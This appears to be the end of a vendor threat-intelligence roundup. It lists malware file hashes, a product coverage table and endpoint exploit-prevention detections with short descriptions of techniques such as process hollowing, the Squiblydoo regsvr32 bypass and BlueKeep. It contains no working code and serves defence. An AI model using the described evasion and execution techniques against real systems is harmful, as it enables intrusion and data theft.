4cb281180eb61ca43f615e21b7d4bf250143bd378b772da0012d3e6b64684d79
4f59598f62042327acce2ad83746f899a503e53451f87ed330f70b55b55efbc9
53018d00d07021aea4539dba4c4311c0787feb5e4b92f5ad0dc9f7832fe516a1
5354859ff3f84691b7b9fd14f40199b0ebf6d1c939ce43fc0c8576a58a0729e9
557db38c9455af0908abc643d3ae5051c4768e1fef842e6ae31759bcae686b8c
57c7a30e0eff61c512cd450263d156dea53971591be1e42585558f394c1eaa48
5d047625743273b27b0ebc830de1082e33aa39e325917ae84dbdb0254853d5b6

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (15672)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Crystalbit-Apple DLL double hijack detected - (2153)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Excessively long PowerShell command detected - (1542)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
A Microsoft Office process has started a windows utility. - (964)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Kovter injection detected - (961)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application whitelist bypass attempt detected. - (663)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Dealply adware detected - (156)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Gamarue malware detected - (96)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
CVE-2019-0708 detected - (91)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Houdini/HWORM detected - (38)
Houdini/HWORM detected. This worm uses an obfuscated VBScript to drop additional malware such as njRAT.